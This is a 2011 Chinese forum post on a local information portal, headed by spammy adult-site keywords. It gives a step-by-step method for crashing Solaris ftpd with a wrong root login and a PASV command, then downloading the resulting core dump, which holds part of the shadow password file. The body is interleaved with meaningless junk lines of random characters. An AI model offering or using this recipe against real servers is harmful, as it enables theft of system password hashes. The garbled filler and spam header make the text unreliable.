亚洲色一色噜一噜噜噜_在线国产精品一区二区_91国自产拍 精品_国产伦三级一区二区
汶上信息港
標(biāo)題:
如何用FIP獲取shadow口令文件
[打印本頁(yè)]
作者:
雜七雜八
時(shí)間:
2011-1-12 21:01
標(biāo)題:
如何用FIP獲取shadow口令文件
該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG,使得用戶可以獲得該機(jī)的口令文件。具體過(guò)程如下:
$ F: c( E! o& S# N2 e; X
9 i/ z+ [' t7 n; r6 h
1.通過(guò) ftp 正常登錄到目的主機(jī)上
& E6 H: ?* R' ^! I
& F0 G; d2 J2 \ [( f+ i" }" q
2.輸入如下命令序列:
, x+ D6 e* S# ?% k: Z5 e1 x+ a- e' U
C+ ~) m! F& ^; Z
ftp> user root wrongpasswd
4 h. J6 D6 U. H# D4 S; _1 M
, `8 ]& ?: _6 t
ftp> quote pasv
, V6 ]5 k# y. T1 q, F/ a
, {# f z# ]7 X& d5 c
3.這時(shí),ftpd會(huì)報(bào)錯(cuò)退出,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core,口令文件就包含在這個(gè)core中。
# k0 M* y b) t, Y# ]. H
; h( \# ~+ \* z% b, r+ Z( b
4.再次進(jìn)入FTP >get core
( g2 d! N$ m+ m9 ^. x; ^3 i
+ O7 b* Y- {, H
補(bǔ)充:雖然在core只有一部分shadow,但是對(duì)于系統(tǒng)來(lái)說(shuō)已經(jīng)是致命的打擊了
, W/ B! s& ?1 M& ?. g' V% o
/ \' ^9 T* M) N4 L0 r- m3 ]
歡迎光臨 汶上信息港 (http://m.loveproblemguru.com/)
Powered by Discuz! X3.5